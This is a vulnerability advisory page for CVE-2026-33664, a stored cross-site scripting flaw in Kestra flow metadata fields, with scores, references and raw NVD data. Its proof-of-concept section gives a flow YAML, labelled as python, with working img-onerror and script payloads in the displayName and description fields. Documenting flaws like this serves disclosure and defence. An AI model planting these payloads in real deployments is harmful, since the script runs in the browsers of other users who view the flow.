CVE-2026-33664

Description

Kestra is an open-source, event-driven orchestration platform Versions up to and including 1.3.3 render user-supplied flow YAML metadata fields — description, inputs[].displayName, inputs[].description — through the Markdown.vue component instantiated with html: true. The resulting HTML is injected into the DOM via Vue's v-html without any sanitization. This allows a flow author to embed arbitrary JavaScript that executes in the browser of any user who views or interacts with the flow. This is distinct from GHSA-r36c-83hm-pc8j / CVE-2026-29082, which covers only FilePreview.vue rendering .md files from execution outputs. The present finding affects different components, different data sources, and requires significantly less user interaction (zero-click for input.displayName). As of time of publication, it is unclear if a patch is available.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:kestra:kestra:*:*:*:*:*:*:*:* - VULNERABLE

Kestra <= 1.3.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-33664 PoC: Stored XSS in Kestra via inputs[].displayName
id: xss-poc-demo
namespace: malicious.namespace
description: |
  This flow demonstrates the XSS vulnerability.
inputs:
  - id: user_input
    # The displayName field is rendered via v-html without sanitization
    displayName: <img src=x onerror=alert('CVE-2026-33664_XSS')>
    type: STRING
    description: <script>alert('Another XSS vector')</script>
tasks:
  - id: harmless_task
    type: io.kestra.core.tasks.log.Log
    message: "Viewing this flow triggers the XSS."

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33664
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33664
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33664/
[4] VulDB https://vuldb.com/cve/CVE-2026-33664
[5] https://github.com/kestra-io/kestra/security/advisories/GHSA-v2mc-8q95-g7hp
[6] https://github.com/kestra-io/kestra/security/advisories/GHSA-v2mc-8q95-g7hp

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33664", "sourceIdentifier": "[email protected]", "published": "2026-03-26T22:16:29.727", "lastModified": "2026-03-31T01:48:34.413", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kestra is an open-source, event-driven orchestration platform Versions up to and including 1.3.3 render user-supplied flow YAML metadata fields — description, inputs[].displayName, inputs[].description — through the Markdown.vue component instantiated with html: true. The resulting HTML is injected into the DOM via Vue's v-html without any sanitization. This allows a flow author to embed arbitrary JavaScript that executes in the browser of any user who views or interacts with the flow. This is distinct from GHSA-r36c-83hm-pc8j / CVE-2026-29082, which covers only FilePreview.vue rendering .md files from execution outputs. The present finding affects different components, different data sources, and requires significantly less user interaction (zero-click for input.displayName). As of time of publication, it is unclear if a patch is available."}, {"lang": "es", "value": "Kestra es una plataforma de orquestación de código abierto impulsada por eventos. Las versiones hasta la 1.3.3 inclusive renderizan los campos de metadatos YAML de flujo proporcionados por el usuario — description, inputs[].displayName, inputs[].description — a través del componente Markdown.vue instanciado con html: true. El HTML resultante se inyecta en el DOM a través de v-html de Vue sin ninguna sanitización. Esto permite a un autor de flujo incrustar JavaScript arbitrario que se ejecuta en el navegador de cualquier usuario que vea o interactúe con el flujo. Esto es distinto de GHSA-r36c-83hm-pc8j / CVE-2026-29082, que cubre solo la renderización de archivos .md por FilePreview.vue a partir de las salidas de ejecución. El hallazgo actual afecta a diferentes componentes, diferentes fuentes de datos y requiere significativamente menos interacción del usuario (cero clics para input.displayName). Al momento de la publicación, no está claro si hay un parche disponible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kestra:kestra:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.3.3", "matchCriteriaId": "607D5BF1-96C9-4F37-B94C-EA1A224FAFAD"}]}]}], "references": [{"url": "https://github.com/kestra-io/kestra/security/advisories/GHSA-v2mc-8q95-g7hp", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/kestra-io/kestra/security/advisories/GHSA-v2mc-8q95-g7hp", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}